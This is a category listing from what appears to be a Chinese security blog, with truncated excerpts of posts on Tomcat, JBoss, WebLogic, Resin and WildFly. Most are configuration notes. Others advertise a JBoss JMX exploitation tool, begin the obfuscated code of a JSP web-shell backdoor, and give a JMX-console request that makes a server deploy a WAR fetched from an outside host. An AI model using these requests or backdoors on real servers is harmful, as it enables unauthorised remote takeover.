Server(11 篇文章)

Jboss 6以上全局Filter加载顺序问题

yzmm
1375 阅读

在之前调试Tomcat的时候就已经发现了Tomcat存在此问题Tomcat7.0.30以上全局Filter加载顺序问题,今天调试Jboss6的时候也发现了同样的问题。原因很简单,Jboss沿用了Tomcat的内核,Servlet容器那块核心代码是使用的Tomcat源码。 既然知道问题所在那么现在的问题就是要找到之前调试Tomcat出问题的类和方法。根据我之前的记录,Tomcat 的Filter加载...

阅读全文

Weblogic war包部署时获取Web根目录问题

yzmm
1438 阅读

在Weblogic当中如果以war包方式部署则不能用request.getRealPath("/")获取web根目录, this.getClass().getClassLoader().getResource("/").getPath()即可获取: /** * 获取web目录,Weblogic 默认以war包部署的时候不能用getRealPath * getResource(&...

阅读全文

Jboss JMX/EJBInvokerServlet、HtmlAdaptor漏洞利用工具

yzmm
2229 阅读

免责声明:本站提供的所有工具及代码仅供交流学习,不得用于商业或黑客行为。 下载地址:Jboss漏洞利用工具.jar 链接: 密码: ucdl 功能说明: 安装jdk并配置好环境变量,然后填好参数先点获取即可,成功后会返回"请求成功."。 1、JMX/EJBInvokerServlet: host写IP或域名:127.0.0.1/p2j.cn port必填,如:8080 2、Ht...

阅读全文

Tomcat7源码eclipse(mvn)

yzmm
1215 阅读

打包好的eclipse项目下载:Tomcat7.0.zip 需要先分别Tomcat7二进制文件下载:apache-tomcat-7.0.52.zip 和 Tomcat7源文件: apache-tomcat-7.0.52-src.zip。然后需要安装好maven环境:Maven。参考原文:http://zhh2009.iteye.com/blog/1557891 新建一个Tomcat7目录,解压ap...

阅读全文

Jboss WildFly 8 Undertow

yzmm
1406 阅读

Jboss官网最新版本是Jboss7,以前没注意原来WildFly 8就是Jboss8.Jboss那货改名了。 Jboss下载地址 WildFly下载地址 高性能非阻塞Web 服务器Undertow 概述 WildFly 8 包含了一个全新的Web服务器(Undertow),WildFly 8 默认的Web服务器为Undertow。一句话概括什么是Undertow - 高性能非阻塞 Web 服务器...

阅读全文

Tomcat7.0.30以上全局Filter加载顺序问题

yzmm
1548 阅读

好吧又被Tom猫坑了,因为上一次是解决Tomcat6和Tomcat7的加载问题被坑了。Tomcat 版本带来的web.xml filter和servlert配置的变化 。昨天测试发现Tomcat7.0.30再一次修改了Filter的加载顺序。 在org.apache.catalina.core.ApplicationFilterRegistration.java的版本变动(修改74-78行、103...

阅读全文

Resin 4.x app-default.xml配置文件加载问题

yzmm
1509 阅读

今天在调试Resin4.x的时候发现反复修改:conf/app-default.xml都无效,记得以前在windows下测试Resin4没啥问题的。仔细看了下才发现原来Resin4后app-default.xml的加载位置从Resin3默认的conf/app-default.xml变成了加载lib/resin.jar下的META-INF/caucho目录下的app-default.xml了(cla...

阅读全文

Java WebServer 自动部署后门

yzmm
1534 阅读

在乌云社区发现有人发了一个Jboss的自动部署war的后门求此后门的利用方法。 <%@page import="java.io.*, java.util.*, sun.misc.BASE64Decoder"%> <% String PJdpj = ""; String pIGx = ""; String RSVw = S...

阅读全文

JBoss Jmx GetShell

yzmm
2050 阅读

请求:http://192.168.0.113:8080/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://www.ahack.net/iswin.war 成功后访问:http://192.168.0.113:80...

阅读全文